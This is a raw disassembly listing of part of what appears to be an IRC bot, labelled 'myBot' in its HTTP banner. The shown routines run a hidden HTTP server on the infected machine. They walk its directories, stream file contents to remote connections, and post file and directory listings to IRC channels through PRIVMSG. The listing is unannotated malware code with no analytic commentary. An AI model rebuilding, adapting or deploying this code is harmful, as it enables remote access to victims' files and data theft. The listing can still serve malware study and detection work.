push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_412BB5
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_403566
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_403422
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_412E0D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_412E0D
add esp, 28h
jmp loc_4036CE
; ---------------------------------------------------------------------------
loc_403417: ; CODE XREF: sub_4030C4+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_403390
; ---------------------------------------------------------------------------
loc_403422: ; CODE XREF: sub_4030C4+308�j
cmp [ebp+arg_C], edi
jz loc_403520
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_40344E: ; CODE XREF: sub_4030C4+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40344E
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_1 ; "%s%s/"
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_403491: ; CODE XREF: sub_4030C4+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403491
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_4034B5: ; CODE XREF: sub_4030C4+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034B5
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_4034D7
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4034DC
; ---------------------------------------------------------------------------
loc_4034D7: ; CODE XREF: sub_4030C4+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4034DC: ; CODE XREF: sub_4030C4+411�j
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_4034EF: ; CODE XREF: sub_4030C4+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034EF
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_4036BF
; ---------------------------------------------------------------------------
loc_403520: ; CODE XREF: sub_4030C4+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_412E0D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_40354D: ; CODE XREF: sub_4030C4+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_412E0D
add esp, 24h
jmp loc_4036CE
; ---------------------------------------------------------------------------
loc_403566: ; CODE XREF: sub_4030C4+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_403590
push edi
push [ebp+var_36C]
call sub_402439
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403590: ; CODE XREF: sub_4030C4+4A8�j
cmp [ebp+arg_C], edi
jz loc_4036A4
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_4035BC: ; CODE XREF: sub_4030C4+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035BC
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_4035FF: ; CODE XREF: sub_4030C4+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035FF
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_403623: ; CODE XREF: sub_4030C4+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403623
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_403645
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40364A
; ---------------------------------------------------------------------------
loc_403645: ; CODE XREF: sub_4030C4+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40364A: ; CODE XREF: sub_4030C4+57F�j
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_40365D: ; CODE XREF: sub_4030C4+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40365D
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
add esp, 1Ch
jmp short loc_4036CE
; ---------------------------------------------------------------------------
loc_4036A4: ; CODE XREF: sub_4030C4+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_4036BF: ; CODE XREF: sub_4030C4+457�j
lea eax, [ebp+var_24C]
push eax
call sub_412E0D
add esp, 18h
loc_4036CE: ; CODE XREF: sub_4030C4+34E�j
; sub_4030C4+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4036D7: ; CODE XREF: sub_4030C4+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4036D7
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
cmp [ebp+arg_8], edi
jz short loc_403702
push 0FAh
call ds:dword_41F000 ; Sleep
loc_403702: ; CODE XREF: sub_4030C4+25C�j
; sub_4030C4+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_41F050 ; FindNextFileA
test eax, eax
jnz loc_403319
loc_40371A: ; CODE XREF: sub_4030C4+24A�j
push [ebp+var_C]
call ds:dword_41F044 ; FindClose
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_40375F
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_402439
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_402439
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_412BB5
add esp, 14h
jmp short loc_40378D
; ---------------------------------------------------------------------------
loc_40375F: ; CODE XREF: sub_4030C4+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_403779
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40378D
; ---------------------------------------------------------------------------
loc_403779: ; CODE XREF: sub_4030C4+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_412BB5
add esp, 10h
loc_40378D: ; CODE XREF: sub_4030C4+699�j
; sub_4030C4+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_403796: ; CODE XREF: sub_4030C4+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403796
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4030C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037B8 proc near ; CODE XREF: sub_4039DE+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call ds:dword_41F03C ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403875
push esi
push ebx
call ds:dword_41F060 ; GetFileSize
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_40386E
push edi
jmp short loc_403806
; ---------------------------------------------------------------------------
loc_403803: ; CODE XREF: sub_4037B8+B3�j
mov edx, [ebp+var_8]
loc_403806: ; CODE XREF: sub_4037B8+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_40381D
mov [ebp+var_4], edx
loc_40381D: ; CODE XREF: sub_4037B8+60�j
push 2
push esi
neg edx
push edx
push ebx
call ds:dword_41F05C ; SetFilePointer
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call ds:dword_41F058 ; ReadFile
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403868
call dword_433558 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_40386D
xor eax, eax
loc_403868: ; CODE XREF: sub_4037B8+9F�j
sub [ebp+var_8], eax
jnz short loc_403803
loc_40386D: ; CODE XREF: sub_4037B8+AC�j
pop edi
loc_40386E: ; CODE XREF: sub_4037B8+46�j
push ebx
call ds:dword_41F034 ; CloseHandle
loc_403875: ; CODE XREF: sub_4037B8+31�j
pop esi
pop ebx
leave
retn
sub_4037B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403879 proc near ; CODE XREF: sub_403B4C+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_403888: ; CODE XREF: sub_403879+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_403888
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_4038B3
loc_403896: ; CODE XREF: sub_403879+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_4038A0
mov byte ptr [esi+eax], 2Fh
loc_4038A0: ; CODE XREF: sub_403879+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_4038A6: ; CODE XREF: sub_403879+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4038A6
sub ecx, edx
cmp esi, ecx
jb short loc_403896
loc_4038B3: ; CODE XREF: sub_403879+1B�j
pop esi
pop ebx
pop ebp
retn
sub_403879 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038B7 proc near ; CODE XREF: sub_4078FA+4DC0�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_4334B0 ; WSAStartup
push 6
push 1
push 2
call dword_4334A0 ; socket
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_4335EC ; ntohs
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_406B1D
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_403997
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_40392A
mov eax, (offset asc_41FA74+2)
loc_40392A: ; CODE XREF: sub_4038B7+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_403959: ; CODE XREF: sub_4038B7+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403959
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_433534 ; send
push 40h
pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_433414 ; recv
pop esi
pop ebx
loc_403997: ; CODE XREF: sub_4038B7+65�j
push [ebp+var_4]
call dword_4335AC ; closesocket
call dword_4335B8 ; WSACleanup
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_412BB5
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_4039DC
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
locret_4039DC: ; CODE XREF: sub_4038B7+109�j
leave
retn
sub_4038B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4039DE proc near ; DATA XREF: sub_403B4C+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_412DD0
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_412BB5
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_412BB5
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_403A46
push offset aTextHtml ; "text/html"
jmp short loc_403A4B
; ---------------------------------------------------------------------------
loc_403A46: ; CODE XREF: sub_4039DE+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_403A4B: ; CODE XREF: sub_4039DE+66�j
push eax
call sub_412BB5
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_41F068 ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_41F064 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_403AB8
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_412BB5
add esp, 24h
jmp short loc_403AD0
; ---------------------------------------------------------------------------
loc_403AB8: ; CODE XREF: sub_4039DE+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_412BB5
add esp, 28h
loc_403AD0: ; CODE XREF: sub_4039DE+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_403AD9: ; CODE XREF: sub_4039DE+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403AD9
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_433534 ; send
cmp [ebp+74h+var_A4], ebx
jnz short loc_403B12
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_4037B8
pop ecx
pop ecx
jmp short loc_403B2F
; ---------------------------------------------------------------------------
loc_403B12: ; CODE XREF: sub_4039DE+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_4030C4
add esp, 10h
loc_403B2F: ; CODE XREF: sub_4039DE+132�j
push [ebp+74h+var_44C]
call dword_4335AC ; closesocket
push [ebp+74h+var_B4]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4039DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B4C proc near ; CODE XREF: sub_403E06+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_403B7A
push offset aS_6 ; "\\%s"
jmp short loc_403B82
; ---------------------------------------------------------------------------
loc_403B7A: ; CODE XREF: sub_403B4C+25�j
mov byte ptr [eax], 5Ch
push offset aS_1 ; "%s"
loc_403B82: ; CODE XREF: sub_403B4C+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_412BB5
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_403B9C: ; CODE XREF: sub_403B4C+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403B9C
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_403C22
push 2
pop ebx
loc_403BAD: ; CODE XREF: sub_403B4C+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_403BB6: ; CODE XREF: sub_403B4C+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403BB6
sub eax, edx
cmp ebx, eax
jnb short loc_403BEF
cmp [ebp+esi+var_10C], 25h
jnz short loc_403BEF
cmp [ebp+esi+var_10B], 32h
jnz short loc_403BEF
cmp [ebp+esi+var_10A], 30h
jnz short loc_403BEF
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_403C09
; ---------------------------------------------------------------------------
loc_403BEF: ; CODE XREF: sub_403B4C+75�j
; sub_403B4C+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_403BFF
push 5Ch
pop eax
jmp short loc_403C02
; ---------------------------------------------------------------------------
loc_403BFF: ; CODE XREF: sub_403B4C+AC�j
movsx eax, al
loc_403C02: ; CODE XREF: sub_403B4C+B1�j
mov [ebp+edi+var_210], al
loc_403C09: ; CODE XREF: sub_403B4C+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_403C15: ; CODE XREF: sub_403B4C+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403C15
sub eax, ecx
cmp esi, eax
jb short loc_403BAD
loc_403C22: ; CODE XREF: sub_403B4C+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_412BB5
lea eax, [ebp+var_314]
push offset asc_420328 ; "\n"
push eax
call sub_413859
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_41F06C ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_403C73
cmp eax, 0FFFFFFFFh
jnz short loc_403C76
push [ebp+arg_0]
jmp loc_403CFB
; ---------------------------------------------------------------------------
loc_403C73: ; CODE XREF: sub_403B4C+118�j
mov [ebp+var_4], ebx
loc_403C76: ; CODE XREF: sub_403B4C+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_403C83
mov [ebp+var_4], ebx
loc_403C83: ; CODE XREF: sub_403B4C+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_403D06
cmp [ebp+arg_C], edi
jz short loc_403CFA
lea edi, [ebp+var_314]
dec edi
loc_403CA5: ; CODE XREF: sub_403B4C+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403CA5
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_4205E4 ; "*"
push eax
movsw
call sub_412BB5
lea eax, [ebp+var_210]
push eax
call sub_403879
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_412BB5
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_403D55
; ---------------------------------------------------------------------------
loc_403CFA: ; CODE XREF: sub_403B4C+150�j
push eax
loc_403CFB: ; CODE XREF: sub_403B4C+122�j
call dword_4335AC ; closesocket
jmp loc_403DED
; ---------------------------------------------------------------------------
loc_403D06: ; CODE XREF: sub_403B4C+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call ds:dword_41F03C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403D55
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_412BB5
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call ds:dword_41F060 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_41F034 ; CloseHandle
loc_403D55: ; CODE XREF: sub_403B4C+1AC�j
; sub_403B4C+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_410EEA
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43433C[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_4039DE
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_403DFC
push [ebp+arg_0]
call dword_4335AC ; closesocket
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_412BB5
lea eax, [ebp+var_8C4]
push eax
call sub_401C33
add esp, 10h
loc_403DED: ; CODE XREF: sub_403B4C+1B5�j
; sub_403B4C+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403DF4: ; CODE XREF: sub_403B4C+2B6�j
push 5
call ds:dword_41F000 ; Sleep
loc_403DFC: ; CODE XREF: sub_403B4C+26F�j
cmp [ebp+var_318], edi
jz short loc_403DF4
jmp short loc_403DED
sub_403B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_403E06 proc near ; DATA XREF: sub_401141+363�o
; sub_4078FA+3FA2�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_4335EC ; ntohs
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_4334A0 ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_4041D9
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_434344[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_433578 ; bind
cmp eax, edi
jz loc_4041D9
push 7FFFFFFFh
push ebx
call dword_4335C0 ; listen
cmp eax, edi
jz loc_4041D9
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_433444 ; ioctlsocket
cmp eax, edi
jz loc_4041D9
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_4041BB
; ---------------------------------------------------------------------------
loc_403EEB: ; CODE XREF: sub_403E06+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_403EF0: ; CODE XREF: sub_403E06+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_4334F4 ; __WSAFDIsSet
test eax, eax
jz loc_404198
cmp esi, ebx
jnz short loc_403F6D
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_433464 ; accept
cmp eax, 0FFFFFFFFh
jz loc_404198
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_403F46
loc_403F38: ; CODE XREF: sub_403E06+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_403F46
inc ecx
cmp ecx, edx
jb short loc_403F38
loc_403F46: ; CODE XREF: sub_403E06+130�j
; sub_403E06+139�j
cmp ecx, edx
jnz short loc_403F5C
cmp edx, 40h
jnb short loc_403F5C
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_403F5C: ; CODE XREF: sub_403E06+142�j
; sub_403E06+147�j
cmp eax, [ebp+var_4]
jbe loc_404198
mov [ebp+var_4], eax
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403F6D: ; CODE XREF: sub_403E06+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
lea edi, [ebp+var_18F0]
rep stosd
push 1000h
